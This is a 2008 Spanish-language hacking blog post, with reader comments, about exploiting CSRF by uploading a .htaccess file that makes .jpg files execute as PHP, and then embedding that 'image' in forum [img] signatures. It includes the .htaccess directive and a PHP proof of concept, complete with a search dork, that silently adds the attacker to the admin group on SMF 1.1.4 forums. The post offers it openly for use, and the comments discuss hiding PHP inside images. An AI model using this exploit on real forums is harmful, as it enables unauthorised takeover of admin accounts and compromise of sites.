martes, 26 de agosto de 2008

CSRF: Explotando con .htaccess

Saludos!


Muchas veces no sabemos cómo ingeniárnosla para poder explotar un CSRF, puesto que hasta hoy esto ha requerido de la pericia y habilidad social (lo que denominados ingenieria social) del atacante para conseguir que nuestra víctima viera una web, o clicase sobre un link... Gracias a una vulnerabilidad "presuntamente" descubierta por WHK esto se ha terminado (digo presuntamente, porque yo ya había leido hace tiempo algo relacionado con esto, pero nunca vi esto exactamente, por eso no puedo decir si realmente ha sido él o no el descubridor, yo en todo caso esta información la he sacado de un post suyo en elhacker.net).


La vulneravilidad está presente en todos aquellos sistemas o aplicaciones webs que permitan el uso de tags para la visualización de imágenes. Hoy en día creo que el 100% de los foros podrían ser vulnerables debido a que todos usan [img][/img].


Para explotar esta vulnerabilidad es necesario crear un .htaccess en un directorio, y agregarle este contenido:

<Files *.jpg>
ForceType application/x-httpd-php
</Files>

Estas líneas lo que haran será que se interpreten los archivos .jpg como si se tratasen de aplicaciones, lo que nos permitiría meter código PHP dentro del source de un .jpg y que éste se ejecute cuando se visualice en otra página.

Aqui les dejo un exploit para usar en las firmas de los foros SMF 1.1.4 y ser admins... Tendreis que modificarle un par de cosillas (anti-Kiddies)

<?php
/*
SMF 1.1.4 ADD USER IN A GROUP VULNERABILITY
PoC codded by Vengador de las Sombras
Dork: "Powered by SMF 1.1.4"
============================================
Cross Site Request Forguery
============================================
Gr3tZ to: Lëssiëm, WaesWaes, Plaga, Lutscher
Phonix, Fr34k, Keynet, CHR0N05,
Mycrox & #RE & ArgeniversoHack
Members
=============================================
(c)F.o.S. TeaM 2008
*
$foro = $_GET['foro'];
if(isset($_GET['foro'])){
header("Location: ".$foro./indez.php?action=membergroups;sa=members;group=1;realName=[OurNickName];toAdd=usertoadd&add=Add+Members&sc=[Admin ID]"):
}
*/
?>


Ya sabeis como utilizarlo :D
5 0verl0ad Labs: CSRF: Explotando con .htaccess Saludos! Muchas veces no sabemos cómo ingeniárnosla para poder explotar un CSRF, puesto que hasta hoy esto ha requerido de la pericia y ...

4 comentarios:

Hyde dijo...

Muy interesante amigo!!

Voy a revisar mi .htacces :D :D

Gracias por el dato ;)

Anónimo dijo...

esto funciona en un foro de foroactivo?

Jorge dijo...

Oyes una pregunta Companero Como podria incrustar codigo php en la imagen esque Cuando lo incrusto en la imagen No aparese la imagen despue..

>> s E t H << dijo...

al poner el código php no hay ninguna imágen. Si igual queres mostrar una podes hacerlo enviando las cabeceras de imagen (png, jpg o la que corresponda) y despues el contenido de la imagen (lo podes poner en el source con base64, leerlo de una imagen de verdad, usar gd, etc)

< >